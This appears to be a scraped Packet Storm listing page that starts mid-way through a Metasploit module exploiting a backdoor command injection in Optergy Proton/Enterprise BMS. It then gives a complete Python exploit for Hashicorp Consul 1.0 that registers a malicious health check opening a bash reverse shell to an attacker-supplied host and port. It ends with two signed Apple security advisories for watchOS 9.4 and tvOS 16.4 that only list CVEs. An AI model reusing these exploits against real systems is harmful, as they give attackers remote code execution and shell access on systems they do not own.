'/tools/ajax/ConsoleResult.html'),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        'command' => payload,        'challenge' => challenge,        'answer' => answer      }    })    if res.nil? || (res.code != 200)      return nil    else      # get result and return the command response      res_json = res.get_json_document      return nil if res_json.nil? || res_json.blank?      res_cmd_output = res_json['response']['message']      return res_cmd_output    end  end  # Checking if the target is vulnerable by executing the whoami command via the backdoor  def check    res = execute_command('whoami')    return Exploit::CheckCode::Safe unless res && (res.chomp == 'root' || res.chomp == 'optergy')    Exploit::CheckCode::Vulnerable  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      res = execute_command(payload.encoded)      fail_with(Failure::PayloadFailed, "#{datastore['PAYLOAD']} failed.") if res.nil?    when :linux_dropper      # Don't check the response here since the server won't respond      # if the payload is successfully executed.      execute_cmdstager    end  endend

Optergy Proton And Enterprise BMS 2.0.3a Command Injection

Hashicorp Consul version 1.0 suffers from a remote command execution vulnerability.

    # Exploit Title: Hashicorp Consul v1.0 - Remote Command Execution (RCE)# Date: 26/10/2022# Exploit Author: GatoGamer1155, 0bfxgh0st# Vendor Homepage: https://www.consul.io/# Description: Exploit for gain reverse shell on Remote Command Execution via API# References: https://www.consul.io/api/agent/service.html# Tested on: Ubuntu Server# Software Link: https://github.com/hashicorp/consulimport requests, sysif len(sys.argv) < 6:    print(f"\n[\033[1;31m-\033[1;37m] Usage: python3 {sys.argv[0]} <rhost> <rport> <lhost> <lport> <acl_token>\n")    exit(1)target = f"http://{sys.argv[1]}:{sys.argv[2]}/v1/agent/service/register"headers = {"X-Consul-Token": f"{sys.argv[5]}"}json = {"Address": "127.0.0.1", "check": {"Args": ["/bin/bash", "-c", f"bash -i >& /dev/tcp/{sys.argv[3]}/{sys.argv[4]} 0>&1"], "interval": "10s", "Timeout": "864000s"}, "ID": "gato", "Name": "gato", "Port": 80}try:    requests.put(target, headers=headers, json=json)    print("\n[\033[1;32m+\033[1;37m] Request sent successfully, check your listener\n")except:    print("\n[\033[1;31m-\033[1;37m] Something went wrong, check the connection and try again\n")

Hashicorp Consul 1.0 Remote Command Execution

Apple Security Advisory 2023-03-27-7 - watchOS 9.4 addresses bypass, code execution, integer overflow, out of bounds read, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-03-27-7 watchOS 9.4

watchOS 9.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213678.

AppleMobileFileIntegrity  
Available for: Apple Watch Series 4 and later  
Impact: A user may gain access to protected parts of the file system  
Description: The issue was addressed with improved checks.  
CVE-2023-23527: Mickey Jin (@patch1t)

Calendar  
Available for: Apple Watch Series 4 and later  
Impact: Importing a maliciously crafted calendar invitation may  
exfiltrate user information  
Description: Multiple validation issues were addressed with improved  
input sanitization.  
CVE-2023-27961: Rıza Sabuncu (@rizasabuncu)

CoreCapture  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-28181: Tingting Yin of Tsinghua University

Find My  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to read sensitive location information  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-23537: an anonymous researcher

FontParser  
Available for: Apple Watch Series 4 and later  
Impact: Processing a maliciously crafted image may result in  
disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-27956: Ye Zhang of Baidu Security

Foundation  
Available for: Apple Watch Series 4 and later  
Impact: Parsing a maliciously crafted plist may lead to an unexpected  
app termination or arbitrary code execution  
Description: An integer overflow was addressed with improved input  
validation.  
CVE-2023-27937: an anonymous researcher

Identity Services  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access information about a user’s  
contacts  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-27928: Csaba Fitzl (@theevilbit) of Offensive Security

ImageIO  
Available for: Apple Watch Series 4 and later  
Impact: Processing a maliciously crafted image may result in  
disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23535: ryuzaki

ImageIO  
Available for: Apple Watch Series 4 and later  
Impact: Processing a maliciously crafted image may result in  
disclosure of process memory  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2023-27929: Meysam Firouzi (@R00tkitSMM) of Mbition Mercedes-Benz  
Innovation Lab and jzhu working with Trend Micro Zero Day Initiative

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2023-27969: Adam Doupé of ASU SEFCOM

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-27933: sqrtpwn

Podcasts  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: The issue was addressed with improved checks.  
CVE-2023-27942: Mickey Jin (@patch1t)

Shortcuts  
Available for: Apple Watch Series 4 and later  
Impact: A shortcut may be able to use sensitive data with certain  
actions without prompting the user  
Description: The issue was addressed with additional permissions  
checks.  
CVE-2023-27963: Jubaer Alnazi Jabin of TRS Group Of Companies and  
Wenchao Li and Xiaolong Bai of Alibaba Group

TCC  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: This issue was addressed by removing the vulnerable  
code.  
CVE-2023-27931: Mickey Jin (@patch1t)

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may bypass Same  
Origin Policy  
Description: This issue was addressed with improved state management.  
WebKit Bugzilla: 248615  
CVE-2023-27932: an anonymous researcher

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: A website may be able to track sensitive user information  
Description: The issue was addressed by removing origin information.  
WebKit Bugzilla: 250837  
CVE-2023-27954: an anonymous researcher

Additional recognition

Activation Lock  
We would like to acknowledge Christian Mina for their assistance.

CFNetwork  
We would like to acknowledge an anonymous researcher for their  
assistance.

CoreServices  
We would like to acknowledge Mickey Jin (@patch1t) for their  
assistance.

ImageIO  
We would like to acknowledge Meysam Firouzi @R00tkitSMM for their  
assistance.

Mail  
We would like to acknowledge Chen Zhang, Fabian Ising of FH Münster  
University of Applied Sciences, Damian Poddebniak of FH Münster  
University of Applied Sciences, Tobias Kappert of Münster University  
of Applied Sciences, Christoph Saatjohann of Münster University of  
Applied Sciences, Sebast, and Merlin Chlosta of CISPA Helmholtz  
Center for Information Security for their assistance.

Safari Downloads  
We would like to acknowledge Andrew Gonzalez for their assistance.

WebKit  
We would like to acknowledge an anonymous researcher for their  
assistance.

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/kb/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmQiHn4ACgkQ4RjMIDke  
NxlR6A/+IfL/Ox8qSL2VCsB8vlkddkF4dX5NK6hHzLqZIBq0LmLS8/iEK21+MKP3  
F3OwkeM/dgPJwTrXyLiMqDrn/Qh9HPUD1j2iNbPIYCZRBd7O4iHgbwhlT7UAZyMu  
JzAMFRokr4tRDJJvDjXHL5dPtk/YliTZSynjeJNqEGG5+rNUW6jjPoqEp5w+aPYG  
HwsxZCvySyaOxdB9mWIKJMPUf+uz/HtAn60CA59UeIxliHbco5yZZdqVwTjEwcz4  
EJockj5dnK7dDa6yIHnGGlv8Owx2wvtUU3bRMSQ712Zqek+qYxS7Bcp3ywwf5OQM  
mIIdLFDaDktNFXMMxsB9IgTuyAziUnjWuJ18NaYPy1lJRBZW/SHblPUoGObRrfoe  
JFa33R8lsW9G9ItvLGdXVB73FyfeKnFI1WkeBTPNk4bhkAbTYzPK7IOdHQ6GYSPi  
DpVJvZqiD6tgIpngqrMjkOVXoM9OhJVct3G81CrqZdSkUrVeBqHrmw7D8FE08xkF  
eqZAnuEDF/muUP49n2RiaIAfw9wFX8wVYbWEziC+DZU5QHqpogHPzn3RJF2yZ3cl  
jhLaY3BEibgE/ISyzQ08JysDWeGHwpyRwhr6FVTlEOuHqMCWfGQ/+WSKF0GigXMD  
itrkUpyaSJdLn+oc2N3hmDGdyPKwWMmRP9Qa4/nAFaPV+CJedbA=  
=KG/z  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-03-27-7

Apple Security Advisory 2023-03-27-6 - tvOS 16.4 addresses bypass, code execution, integer overflow, out of bounds read, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-03-27-6 tvOS 16.4

tvOS 16.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213674.

AppleMobileFileIntegrity  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: A user may gain access to protected parts of the file system  
Description: The issue was addressed with improved checks.  
CVE-2023-23527: Mickey Jin (@patch1t)

Core Bluetooth  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: Processing a maliciously crafted Bluetooth packet may result  
in disclosure of process memory  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
CVE-2023-23528: Jianjun Dai and Guang Gong of 360 Vulnerability  
Research Institute

CoreCapture  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-28181: Tingting Yin of Tsinghua University

FontParser  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: Processing a maliciously crafted image may result in  
disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-27956: Ye Zhang of Baidu Security

Foundation  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: Parsing a maliciously crafted plist may lead to an unexpected  
app termination or arbitrary code execution  
Description: An integer overflow was addressed with improved input  
validation.  
CVE-2023-27937: an anonymous researcher

Identity Services  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: An app may be able to access information about a user’s  
contacts  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-27928: Csaba Fitzl (@theevilbit) of Offensive Security

ImageIO  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: Processing a maliciously crafted image may result in  
disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23535: ryuzaki

ImageIO  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: Processing a maliciously crafted image may result in  
disclosure of process memory  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2023-27929: Meysam Firouzi (@R00tkitSMM) of Mbition Mercedes-Benz  
Innovation Lab and  jzhu working with Trend Micro Zero Day Initiative

Kernel  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2023-27969: Adam Doupé of ASU SEFCOM

Kernel  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-27933: sqrtpwn

Podcasts  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: An app may be able to access user-sensitive data  
Description: The issue was addressed with improved checks.  
CVE-2023-27942: Mickey Jin (@patch1t)

TCC  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: An app may be able to access user-sensitive data  
Description: This issue was addressed by removing the vulnerable  
code.  
CVE-2023-27931: Mickey Jin (@patch1t)

WebKit  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: Processing maliciously crafted web content may bypass Same  
Origin Policy  
Description: This issue was addressed with improved state management.  
WebKit Bugzilla: 248615  
CVE-2023-27932: an anonymous researcher

WebKit  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: A website may be able to track sensitive user information  
Description: The issue was addressed by removing origin information.  
WebKit Bugzilla: 250837  
CVE-2023-27954: an anonymous researcher

Additional recognition

CFNetwork  
We would like to acknowledge an anonymous researcher for their  
assistance.

CoreServices  
We would like to acknowledge Mickey Jin (@patch1t) for their  
assistance.

ImageIO  
We would like to acknowledge Meysam Firouzi @R00tkitSMM for their  
assistance.

WebKit  
We would like to acknowledge an anonymous researcher for their  
assistance.

Apple TV will periodically check for software updates. Alternatively,  
you may manually check for software updates by selecting "Settings ->  
System -> Software Update -> Update Software."  To check the current  
version of software, select "Settings -> General -> About."  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmQiHn0ACgkQ4RjMIDke  
Nxlyyg//ePQb9FK6kVxRCnemA/ohDVERRj4NgAV7wlwaD5S/JiB2J1udvO6PJtMK  
WR70cDcxOyEWwS45ejP/QhkzpEMRQr0Xhgr9E/BRFm8cltHmPbrVLqBXkIYYDYOT  
GfLTgzEPHkHnByJySHr8DfNHxDib7oABRaNWHN5Jlr9c7+acpZokOPk7EXcnwojd  
yZjxkbiSkOmfizS+hIQvrSXQl+squ1Lva8v4KyygWqnCqbnq+9SVKVAFchWTnXqD  
LvODlXEb5a8TwCapcWLQKtrn3oK84tzI9iIDVrY0qhg5Y3Igu0ZrKF6pIcAk2jiA  
MFS6rrgRzOk3nEGCYAIhVY8pt989oE5euC9OK/pT1gOUBzXPAiN3/MmvRqRNkNmJ  
waNaVw/ITLVWbAN7HlwOZCft1qv+jCdtI7w5U/GwTXWR/ZcFeTFq93RNRw3pbhqZ  
dXhJAEbqAxFIgkobmAX7jTnXThs8WJUPIhs3aPFLRrpmVpR+s3XanvGxyXK4gj6/  
9ziqm2HQCCYxz654R65Dh97bRhZRD5vtf9ygtuAbQwQnP61df4MDN3hsQAUyhriT  
vu0TYdd7yg1oG3mqJxybx9eMQOLB8PBGAR3/pXcD+gLiLATRyH6i4QP43uoQCExE  
1hCVqZBIMG/vq8M0XEKT+85/RdaLBdlDKES3N4QLq4UztsWT4bY=  
=P2oh  
-----END PGP SIGNATURE-----

Source

Packet Storm